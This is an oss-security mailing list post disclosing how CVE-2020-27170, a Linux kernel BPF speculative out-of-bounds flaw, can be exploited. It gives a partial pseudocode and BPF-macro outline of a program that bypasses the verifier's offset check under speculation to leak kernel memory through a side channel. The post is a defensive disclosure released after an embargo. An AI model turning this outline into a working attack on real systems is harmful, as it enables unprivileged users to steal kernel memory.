oss-sec mailing list archives
Re: [CVE-2020-27170] Protection against speculatively out-of-bounds loads in the Linux kernel can be bypassed by unprivileged local users to leak content of kernel memory
From: Piotr Krysiuk <piotras () gmail com>
Date: Wed, 24 Mar 2021 19:34:50 +0000
Some details of how CVE-2020-27170 could be exploited in practice were provided via the linux-distros mailing list with a 7-day embargo. This was intended to help any affected Linux distributions to assess the risk and decide about any appropriate actions. As the embargo expires today, I was asked to share these details publicly on oss-security.

The CVE-2020-27170 vulnerability has been successfully reproduced against Linux kernel v5.12-rc3 using the following logic for a BPF program attached to a socket:

    load bpf_context pointer (BPF_REG_1) into BPF_REG_CTX,
    load pointer to our big array into BPF_REG_MAP_PTR,
    load offset of data to leak into BPF_REG_OFFSET,

    // load any slowly-loaded value...
    BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200),
    // ... and turn it into known zero for verifier,
    // while preserving slowly-loaded dependency for affected hardware
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1),
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2),

    // speculatively bypassed offset check
    BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK, skip_speculation),

    // speculatively unbounded pointer arithmetic
    BPF_ALU64_REG(BPF_ADD, BPF_REG_CTX, BPF_REG_OFFSET),

    // speculatively unbounded load
    BPF_LDX_MEM(BPF_W, BPF_REG_LEAKED_WORD, BPF_REG_CTX, offsetof(struct __sk_buff, protocol)),

    transmit speculatively loaded BPF_REG_LEAKED_WORD via side-channel,

The full reproducers were shared with a number of Linux distributions for protection purposes.